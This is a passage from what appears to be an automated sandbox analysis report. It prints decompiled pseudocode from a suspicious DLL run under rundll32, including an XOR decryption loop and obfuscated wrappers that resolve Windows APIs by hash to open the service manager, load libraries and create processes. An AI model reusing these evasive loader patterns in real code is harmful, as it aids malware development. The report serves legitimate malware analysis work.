				_t68 = _a4;
				_t118 = _t117 + 0x10;
				_t113 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t113 - 0xfffffffe;
					if(_t113 != 0xfffffffe) {
						_t108 = 0xfffffffe;
						E10006D5C(_t91, 0xfffffffe, _t114, 0x1004d054);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t113 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t95 = _v12;
							_t75 = _t113 + (_t113 + 2) * 2;
							_t92 =  *((intOrPtr*)(_t95 + _t75 * 4));
							_t76 = _t95 + _t75 * 4;
							_t96 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t97 = _v5;
								goto L7;
							} else {
								_t108 = _t114;
								_t77 = E10006D0C(_t96, _t114);
								_t97 = 1;
								_v5 = 1;
								_t125 = _t77;
								if(_t125 < 0) {
									_v16 = 0;
									L13:
									E100052B0(_t108, _t113, _t114, _v12, _t114);
									goto L14;
								} else {
									if(_t125 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x1004295c;
											if(__eflags != 0) {
												_t87 = E1003F6B0(__eflags, 0x1004295c);
												_t118 = _t118 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t116 =  *0x1004295c; // 0x1000544e
													 *0x1004223c(_a4, 1);
													 *_t116();
													_t114 = _v20;
													_t118 = _t118 + 8;
												}
												_t78 = _a4;
											}
										}
										_t109 = _t78;
										E10006D40(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t113;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t113) {
											_t109 = _t113;
											E10006D5C(_t80, _t113, _t114, 0x1004d054);
											_t80 = _a8;
										}
										 *((intOrPtr*)(_t80 + 0xc)) = _t92;
										E100052B0(_t109, _t113, _t114, _v12, _t114);
										E10006D24();
										asm("int3");
										_push(8);
										_push(0x1004af50);
										E100040F0();
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L29:
														_t103 =  *(_t83 + 0x1c);
														__eflags = _t103;
														if(_t103 != 0) {
															_t111 =  *(_t103 + 4);
															__eflags = _t111;
															if(_t111 == 0) {
																__eflags =  *_t103 & 0x00000010;
																if(( *_t103 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t104 =  *_t83;
																	__eflags = _t104;
																	if(_t104 != 0) {
																		 *0x1004223c(_t104);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E100054EF( *(_t83 + 0x18), _t111);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L29;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L29;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L37;
							L7:
							_t113 = _t92;
						} while (_t92 != 0xfffffffe);
						if(_t97 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L37:
			}

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 1000532F
__IsNonwritableInCurrentImage.LIBCMT ref: 100053E3

Strings

csm, xrefs: 100053CD

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction ID: d5b3b1a8fdddd6847bee6f7c852b1cc60a9faa064ac7a8f1db0e4c0cbd549406
Opcode Fuzzy Hash: b72c7d427ada22c9dc5d255588a2ec1dadbe3eb316af704d99ff2e48eaabf8d0
Instruction Fuzzy Hash: 7D41B034E00219ABEF00CF68C884A9FBBF5EF45395F208055E914AB396D772EA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000616F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E1000616F(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_t75 = E10005A3D(_t96, __ecx, __edx, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E10005A3D(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E10004D85(_t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E10004CB7(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E10005D39(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E10012120(_t96, _t100, _t110, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 10006194

Strings

RCC, xrefs: 100061AE
MOC, xrefs: 100061A6

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction ID: 03575899430e62d736dc684c75bb2bfc08ffaeeadd59e420a1883adb1634af53
Opcode Fuzzy Hash: 60f175a55ff9bc0045e5eacab174012f2519ec5f670666269333f57a598f3eb1
Instruction Fuzzy Hash: F6418B71900209EFEF02CF94CD81AEE7BB6FF48384F258199F905A7219D735A950DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10001D9A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001D9A(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _t42;
				signed int _t46;
				signed char _t50;
				intOrPtr _t60;
				signed char _t62;
				signed int _t64;
				intOrPtr _t65;
				intOrPtr _t68;
				signed int _t70;
				signed char* _t80;
				signed int _t81;
				signed int _t83;

				_v16 = _v16 & 0x00000000;
				_t80 = _a12;
				_t62 =  *_t80;
				_t42 = _t80[1];
				if(_a8 > 0) {
					_t81 = _v16;
					_t83 = 0x57;
					_t64 = _t62 & 0x000000ff;
					_v12 = _t42 & 0x000000ff;
					_v20 = _t83;
					do {
						_t65 =  *0x1004db60; // 0x3a7450
						_t46 = (_t64 + 0x00000001) % _t83 & 0x000000ff;
						_v16 = _t46;
						_t50 = (( *(_t46 + _t65) & 0x000000ff) + _v12) % _v20;
						_v5 = _t50;
						_v12 = _t50 & 0x000000ff;
						E10001E6E(_t46 + _t65, (_t50 & 0x000000ff) + _t65);
						_t68 =  *0x1004db60; // 0x3a7450
						_t70 = 0x57;
						_t62 = (( *(_v12 + _t68) & 0x000000ff) + ( *(_v16 + _t68) & 0x000000ff)) % _t70;
						ShowWindow(0, 0);
						ShowWindow(0, 0);
						_t60 =  *0x1004db60; // 0x3a7450
						 *(_t81 -  *0x1004d028 + _a4) =  *(_t81 -  *0x1004d028 + _a4) ^  *((_t62 & 0x000000ff) + _t60);
						_t81 = _t81 + 1;
						_t64 = _v16;
						_t83 = 0x57;
					} while (_t81 < _a8);
					_t80 = _a12;
					_t42 = _v5;
				}
				 *_t80 = _t62;
				_t80[1] = _t42;
				return _t42;
			}

0x10001da0
0x10001daa
0x10001dad
0x10001daf
0x10001db2
0x10001db8
0x10001dc1
0x10001dc2
0x10001dc5
0x10001dc8
0x10001dcb
0x10001dd2
0x10001ddc
0x10001ddf
0x10001dee
0x10001df0
0x10001df6
0x10001dfd
0x10001e0a
0x10001e24
0x10001e2b
0x10001e2d
0x10001e33
0x10001e35
0x10001e4d
0x10001e50
0x10001e51
0x10001e54
0x10001e55
0x10001e5e
0x10001e61
0x10001e64
0x10001e65
0x10001e67
0x10001e6d

APIs

ShowWindow.USER32(00000000,00000000), ref: 10001E2D
ShowWindow.USER32(00000000,00000000), ref: 10001E33

Strings

Pt:, xrefs: 10001DD2, 10001E0A, 10001E35

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ShowWindow
String ID: Pt:
API String ID: 1268545403-513970914
Opcode ID: 801d55fe26135fc896191c056dc57f1708cbf07a9987f522de780e822f3417cf
Instruction ID: 981a1ea77037a91adf13050d762a9da1fa966bd620879bc9979f607e418a7e4c
Opcode Fuzzy Hash: 801d55fe26135fc896191c056dc57f1708cbf07a9987f522de780e822f3417cf
Instruction Fuzzy Hash: D221D639A442A4EFD701DF55CC51BEDBFB1EF5A210F18808BE494A7292C674B505CF90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2792 Parent PID: 2800 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	994
Total number of Limit Nodes:	14

Executed Functions

Function 001B2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E001B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001B602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x001b295f
0x001b2964
0x001b2967
0x001b296a
0x001b296d
0x001b296e
0x001b296f
0x001b2977
0x001b2985
0x001b298a
0x001b2992
0x001b299a
0x001b29a2
0x001b29a9
0x001b29b0
0x001b29b7
0x001b29bb
0x001b29cf
0x001b29dc
0x001b29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001B29DC

Strings

<^, xrefs: 001B2977

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 30dfe23d4da1fee25088d072443731b0ff0781665e5998f83e193314ba0cf3bf
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: C1018471900108BFEB14DF95DC0A8DFBFB6EF54310F108048F50866250D7B55F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001BC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001B602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001bc6e1
0x001bc6e6
0x001bc6f0
0x001bc6fc
0x001bc703
0x001bc706
0x001bc70d
0x001bc711
0x001bc715
0x001bc71c
0x001bc723
0x001bc72a
0x001bc731
0x001bc738
0x001bc751
0x001bc762
0x001bc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001BC762

Strings

/O, xrefs: 001BC6E6

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 46e2d91a0fb16c85d3561f04043ab603bb37657e41196792dbba4e1767537ef8
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 441133B290122DBBCB25DF95DC4A8DFBFB8EF14714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001B1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E001B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001B602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x001b1006
0x001b1009
0x001b100c
0x001b1011
0x001b1016
0x001b101d
0x001b1026
0x001b102d
0x001b1034
0x001b103b
0x001b1047
0x001b104f
0x001b1057
0x001b105e
0x001b1065
0x001b106c
0x001b1073
0x001b1077
0x001b108b
0x001b1096
0x001b109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001B1096

Strings

[, xrefs: 001B103B

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 478305541f17ea960f27408f27b120a6598dfb591520c8eb493791fb93af5927
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: E8015BB6D01308FBDF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001B4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001B4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001C07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001b485e
0x001b487a
0x001b487d
0x001b4884
0x001b488b
0x001b4892
0x001b489d
0x001b48a0
0x001b48ad
0x001b48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001B48B7

Strings

[, xrefs: 001B488B

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 00904b64e157f3b053c7fc5c284fe6015112767b80c40a4adc05144c8812648e
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: D7F017B0A05309FBDB08CFE8CA56A9EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E001C4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001B602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001c4f80
0x001c4f81
0x001c4f82
0x001c4f86
0x001c4f87
0x001c4f8c
0x001c4fa5
0x001c4fa8
0x001c4faf
0x001c4fb6
0x001c4fc7
0x001c4fca
0x001c4fd7
0x001c4fe2
0x001c4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001C4FE2

Strings

{#lm, xrefs: 001C4FC2

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: f8de56d074b08df0fb15d029ed067210aaec12f1cc8b3bae4c83b15ebcb1d7b8
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: F5F037B081120CFFDB08EFA4D94289EBFBAEB54300F20819DE804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001C976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001B602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001C07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x001c9772
0x001c9773
0x001c9778
0x001c977a
0x001c977b
0x001c977e
0x001c977f
0x001c9782
0x001c9785
0x001c9788
0x001c9789
0x001c978c
0x001c978f
0x001c9790
0x001c9791
0x001c9794
0x001c9797
0x001c979a
0x001c979d
0x001c97a0
0x001c97a3
0x001c97a6
0x001c97a7
0x001c97a8
0x001c97ad
0x001c97b7
0x001c97c3
0x001c97ca
0x001c97d1
0x001c97d8
0x001c97df
0x001c97e3
0x001c97fc
0x001c9816
0x001c981d

APIs

CreateProcessW.KERNEL32(001B591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001B591A), ref: 001C9816

Memory Dump Source

Source File: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000009.00000002.2111110144.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2111139660.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 814181e527a123c9a8c8c1a76b9dd5d193f68a882cb2efb8b2734a66dab9dca6
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 6411B372901148FBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001BB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

